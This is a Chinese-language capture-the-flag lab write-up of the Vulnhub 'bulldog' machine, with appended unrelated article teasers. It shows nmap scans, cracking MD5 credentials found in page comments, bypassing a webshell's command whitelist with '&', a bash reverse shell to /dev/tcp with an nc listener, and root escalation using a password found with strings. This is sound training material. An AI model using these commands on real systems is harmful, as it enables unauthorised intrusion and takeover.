Vulnhub----bulldog靶场笔记
前提条件
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
主机探测
利用kali的netdiscover
工具扫描靶机ip地址
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
扫描靶机端口
利用kali的nmap
工具扫描靶机ip地址
nmap -p- 192.168.56.101
扫描目标靶机端口的详细服务信息
nmap -p23,80,8080 -A -T4 192.168.56.101
web服务是python2
用浏览器访问192.168.56.101
并未发现异常;接下来扫描网站
发现了 /dev /admin robots.txt
/admin 是一个登录页面,SQL注入并未成功
/robots.txt 并未发现异常
访问/dev,发现了webshell连接,但是显示需要验证身份,可能需要先登录才能有权限使用此webshell
在注释中发现了异常
MD5值加密,使用在线解密网站解密试试。
成功解密两个账号密码:
- nick---bulldog
- sarah---bulldoglover
使用其中一个用户登录成功,然后使用/dev/中的webshell
白名单限制了使用的命令,通过&
绕过
- 现在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash
反弹shell到kali上 - kali上用nc侦听6666端口
nc -nvlp 6666
kali机成功获得反弹的shell
提权
使用普通用户的权限并没有发现要获得的信息,于是要提升root权限
在/home目录下发现bulldogadmin文件夹,看文件名觉得里面应该有东西
发现了隐藏文件夹,进去看看里面的东西
使用cat
命令没有发现异常,使用strings
发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget
在获得的shell界面直接切换root用户报错
于是使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'
输入刚才获取的密码即可
成功获取flag
后续技能学习:
- 反弹shell脚本,不仅仅限于bash方法
python -c 'import pty; pty.spawn("/bin/bash")'
此类常用的shell代码
Vulnhub----bulldog靶场笔记的更多相关文章
- sqli-labs 靶场笔记
sqli-labs 靶场笔记 冲冲冲,好好学习 2020年1月12号 先来点铺垫 分类: 按照请求方法分类: 1.Get型注入:注入参数在get的参数里. 2.POST型注入:注入参数在POST的参数 ...
- VulnHub 实战靶场Breach-1.0
相比于CTF题目,Vulnhub的靶场更贴近于实际一些,而且更加综合考察了知识.在这里记录以下打这个靶场的过程和心得. 测试环境 Kali linux IP:192.168.110.128 Breac ...
- Vulnhub DC-1靶场学习笔记
0x00 环境准备 本文介绍了Vulnhub中DC-1靶机的实战渗透过程,实战的目标是获取到服务器中的5个flag,最终目标是获取到root目录下的thefinalflag文件: 测试环境 备注 Ka ...
- (未完)经典Web漏洞实战演练靶场笔记
记录下自己写的经典Web漏洞靶场的write up,包括了大部分的经典Web漏洞实战场景,做个笔记. 0x01 任意文件下载漏洞 if(!empty($_GET['filename'])){ $fil ...
- CSRF漏洞实战靶场笔记
记录下自己写的CSRF漏洞靶场的write up,包括了大部分的CSRF实战场景,做个笔记. 0x01 无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录tes ...
- Vulnhub实战靶场:ME AND MY GIRLFRIEND: 1
一.环境搭建 1.官网下载连接:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.下载之后,使用Oracle VM Virtual ...
- vulnhub mrRobot渗透笔记
mrRobot渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ kali ip 信息收集 首先依旧时使用nmap扫描靶机的ip地址 n ...
- (未完)XSS漏洞实战靶场笔记
记录下自己写的XSS靶场的write up,也是学习了常见xss漏洞类型的实战场景
- Vulnhub bulldog靶机渗透
配置 VM运行kali,桥接模式设置virtualbox. vbox运行靶机,host-only网络. 信息搜集 nmap -sP 192.168.56.0/24 或者 arp-scan -l #主机 ...
随机推荐
- ABP Framework:移除 EF Core Migrations 项目,统一数据上下文
原文:Unifying DbContexts for EF Core / Removing the EF Core Migrations Project 目录 导读:软件开发的一切都需要平衡 动机 警 ...
- 03 jumpserver用户管理
3.用户管理: (1)创建用户组: (2)创建用户并加入组: (3)用户通过邮件链接修改密码:
- 1、mysql基础入门(1)
1.mysql基础入门: 1.1.数据库介绍:
- 前端BootstrapTable组件不同使用方法的效率各有差异
本人需要解决的问题(#需求) 设备端批量发送数据过来,数据已按照特定字段进行排序,现在本人需要按照传过来的数据动态更新表格,表格的显示区域有限制 因为一些原因,最终确定使用 Bootstrap Tab ...
- 资源:Maven仓库地址路径
Maven下载路径 https://archive.apache.org/dist/maven/maven-3/ 查找需要引入的包路径时,可以在maven仓库进行查找 maven仓库地址:https: ...
- AOP面向切面的实现
AOP(Aspect Orient Programming),我们一般称为面向方面(切面)编程,作为面向对象的一种补充,用于处理系统中分布于各个模块的横切关注点,比如事务管理.日志.缓存等等. AOP ...
- 解决数据库连接池连接mysql时,每隔8小时mysql自动断开所有连接的问题
解决数据库连接池连接mysql时,每隔8小时mysql自动断开所有连接的问题 最近有个问题非常讨厌,我们的工程中使用自己的连接池连接mysql数据库,可mysql数据库每隔8小时就会自动断开所有链接, ...
- Nginx配置中的log_format用法梳理 (转)
nginx服务器日志相关指令主要有两条,一条是log_format,用来设置日志格式,另外一条是access_log,用来指定日志文件的存放路径.格式和缓存大小,一般在nginx的配置文件中日记配 ...
- python 06篇 常用模块
一.模块 什么是模块? 模块实质上就是一个python文件,它是用来组织代码的,意思就是说把python代码写到里面,文件名就是模块的名称,test.py test就是模块名称. 1.1 导入模块 i ...
- C语言:体现\r的结果
#include <stdio.h> #include <windows.h> //体现\r的结果 //转义字符\r,回车,将光标移动到当前行最开始 main() { char ...